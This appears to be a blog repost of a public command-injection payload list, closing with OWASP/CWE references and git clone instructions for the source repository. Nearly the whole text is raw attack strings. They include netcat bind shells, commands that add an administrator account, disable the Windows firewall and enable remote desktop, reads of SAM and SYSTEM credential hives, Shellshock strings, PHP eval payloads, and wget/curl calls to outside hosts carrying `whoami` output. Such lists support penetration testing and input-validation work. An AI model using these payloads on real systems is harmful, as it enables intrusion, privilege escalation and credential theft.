XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') exec('ls') exec('pwd') exec('pwd'); exec('sleep 5') exec('sleep 5'); exec('whoami') exec('whoami'); ;{$_GET["cmd"]} `id` |id | id ;id ;id| ;id; & id &&id ;id\n ifconfig | ifconfig ; ifconfig & ifconfig && ifconfig /index.html|id| ipconfig | ipconfig /all ; ipconfig /all & ipconfig /all && ipconfig /all ipconfig /all ls $(`ls`) | ls -l / ; ls -l / & ls -l / && ls -l / ls -l / | ls -laR /etc ; ls -laR /etc & ls -laR /etc && ls -laR /etc | ls -laR /var/www ; ls -laR /var/www & ls -laR /var/www && ls -laR /var/www | ls -l /etc/ ; ls -l /etc/ & ls -l /etc/ && ls -l /etc/ ls -l /etc/ ls -lh /etc/ | ls -l /home/* ; ls -l /home/* & ls -l /home/* && ls -l /home/* ls -l /home/* *; ls -lhtR /var/www/ | ls -l /tmp ; ls -l /tmp & ls -l /tmp && ls -l /tmp ls -l /tmp | ls -l /var/www/* ; ls -l /var/www/* & ls -l /var/www/* && ls -l /var/www/* ls -l /var/www/* \n \n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` \n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` \n/bin/ls -al\n | nc -lvvp 4444 -e /bin/sh| ; nc -lvvp 4444 -e /bin/sh; & nc -lvvp 4444 -e /bin/sh& && nc -lvvp 4444 -e /bin/sh & nc -lvvp 4444 -e /bin/sh nc -lvvp 4445 -e /bin/sh & nc -lvvp 4446 -e /bin/sh| nc -lvvp 4447 -e /bin/sh; nc -lvvp 4448 -e /bin/sh& \necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n \necho INJECTX\nexit\n\033[2Asleep 5\n \necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n | net localgroup Administrators hacker /ADD ; net localgroup Administrators hacker /ADD & net localgroup Administrators hacker /ADD && net localgroup Administrators hacker /ADD net localgroup Administrators hacker /ADD | netsh firewall set opmode disable ; netsh firewall set opmode disable & netsh firewall set opmode disable && netsh firewall set opmode disable netsh firewall set opmode disable netstat ;netstat -a; | netstat -an ; netstat -an & netstat -an && netstat -an netstat -an | net user hacker Password1 /ADD ; net user hacker Password1 /ADD & net user hacker Password1 /ADD && net user hacker Password1 /ADD net user hacker Password1 /ADD | net view ; net view & net view && net view net view \nid| \nid; \nid\n \n/usr/bin/id\n perl -e 'print "X"x1024' || perl -e 'print "X"x16096' | perl -e 'print "X"x16096' ; perl -e 'print "X"x16096' & perl -e 'print "X"x16096' && perl -e 'print "X"x16096' perl -e 'print "X"x16384' ; perl -e 'print "X"x2048' & perl -e 'print "X"x2048' && perl -e 'print "X"x2048' perl -e 'print "X"x2048' || perl -e 'print "X"x4096' | perl -e 'print "X"x4096' ; perl -e 'print "X"x4096' & perl -e 'print "X"x4096' && perl -e 'print "X"x4096' perl -e 'print "X"x4096' || perl -e 'print "X"x8096' | perl -e 'print "X"x8096' ; perl -e 'print "X"x8096' && perl -e 'print "X"x8096' perl -e 'print "X"x8192' perl -e 'print "X"x81920' || phpinfo() | phpinfo() {${phpinfo()}} ;phpinfo() ;phpinfo();// ';phpinfo();// {${phpinfo()}} & phpinfo() && phpinfo() phpinfo() phpinfo(); https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?> https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>    https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?> https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?> :phpversion(); `ping 127.0.0.1` & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & ;${@print(md5(RCEVulnerable))}; ${@print("RCEVulnerable")} ${@print(system($_SERVER['HTTP_USER_AGENT']))} pwd | pwd ; pwd & pwd && pwd \r | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f \r\n route | sleep 1 ; sleep 1 & sleep 1 && sleep 1 sleep 1 || sleep 10 | sleep 10 ; sleep 10 {${sleep(10)}} & sleep 10 && sleep 10 sleep 10 || sleep 15 | sleep 15 ; sleep 15 & sleep 15 && sleep 15 {${sleep(20)}} {${sleep(20)}} {${sleep(3)}} {${sleep(3)}} | sleep 5 ; sleep 5 & sleep 5 && sleep 5 sleep 5 {${sleep(hexdec(dechex(20)))}} {${sleep(hexdec(dechex(20)))}} sysinfo | sysinfo ; sysinfo & sysinfo && sysinfo system('cat C:\boot.ini'); system('cat config.php'); || system('curl https://crowdshield.com/.testing/rce_vuln.txt'); | system('curl https://crowdshield.com/.testing/rce_vuln.txt'); ; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); & system('curl https://crowdshield.com/.testing/rce_vuln.txt'); && system('curl https://crowdshield.com/.testing/rce_vuln.txt'); system('curl https://crowdshield.com/.testing/rce_vuln.txt') system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') systeminfo | systeminfo ; systeminfo & systeminfo && systeminfo system('ls') system('pwd') system('pwd'); || system('sleep 5'); | system('sleep 5'); ; system('sleep 5'); & system('sleep 5'); && system('sleep 5'); system('sleep 5') system('sleep 5'); system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); system('whoami') system('whoami'); test*; ls -lhtR /var/www/ test* || perl -e 'print "X"x16096' test* | perl -e 'print "X"x16096' test* & perl -e 'print "X"x16096' test* && perl -e 'print "X"x16096' test*; perl -e 'print "X"x16096' $(`type C:\boot.ini`) &&type C:\\boot.ini | type C:\Windows\repair\SAM ; type C:\Windows\repair\SAM & type C:\Windows\repair\SAM && type C:\Windows\repair\SAM type C:\Windows\repair\SAM | type C:\Windows\repair\SYSTEM ; type C:\Windows\repair\SYSTEM & type C:\Windows\repair\SYSTEM && type C:\Windows\repair\SYSTEM type C:\Windows\repair\SYSTEM | type C:\WINNT\repair\SAM ; type C:\WINNT\repair\SAM & type C:\WINNT\repair\SAM && type C:\WINNT\repair\SAM type C:\WINNT\repair\SAM type C:\WINNT\repair\SYSTEM | type %SYSTEMROOT%\repair\SAM ; type %SYSTEMROOT%\repair\SAM & type %SYSTEMROOT%\repair\SAM && type %SYSTEMROOT%\repair\SAM type %SYSTEMROOT%\repair\SAM | type %SYSTEMROOT%\repair\SYSTEM ; type %SYSTEMROOT%\repair\SYSTEM & type %SYSTEMROOT%\repair\SYSTEM && type %SYSTEMROOT%\repair\SYSTEM type %SYSTEMROOT%\repair\SYSTEM uname ;uname; | uname -a ; uname -a & uname -a && uname -a uname -a |/usr/bin/id ;|/usr/bin/id| ;/usr/bin/id| $;/usr/bin/id () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' () { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 | wget http://crowdshield.com/.testing/rce.txt & wget http://crowdshield.com/.testing/rce.txt ; wget https://crowdshield.com/.testing/rce_vuln.txt $(`wget https://crowdshield.com/.testing/rce_vuln.txt`) && wget https://crowdshield.com/.testing/rce_vuln.txt wget https://crowdshield.com/.testing/rce_vuln.txt $(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) which curl which gcc which nc which netcat which perl which python which wget whoami | whoami ; whoami ' whoami ' || whoami ' & whoami ' && whoami '; whoami " whoami " || whoami " | whoami " & whoami " && whoami "; whoami $(`whoami`) & whoami && whoami {{ get_user_file("C:\boot.ini") }} {{ get_user_file("/etc/hosts") }} {{4+4}} {{4+8}} {{person.secret}} {{person.name}} {1} + {1} {% For c in [1,2,3]%} {{c, c, c}} {% endfor%} {{[] .__ Class __.__ base __.__ subclasses __ ()}}

References :

Testing for Command Injection (OTG-INPVAL-013)

OWASP Command Injection

WE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

WE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'

Portswigger Web Security - OS Command Injection

Cloning an Existing Repository ( Clone with HTTPS )

root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/command-injection-payload-list.git

Cloning an Existing Repository ( Clone with SSH )

root@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/command-injection-payload-list.git

 

블로그 이미지

wtdsoul

,

공지사항

태그목록

글 보관함

달력

«   2025/01   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

티스토리툴바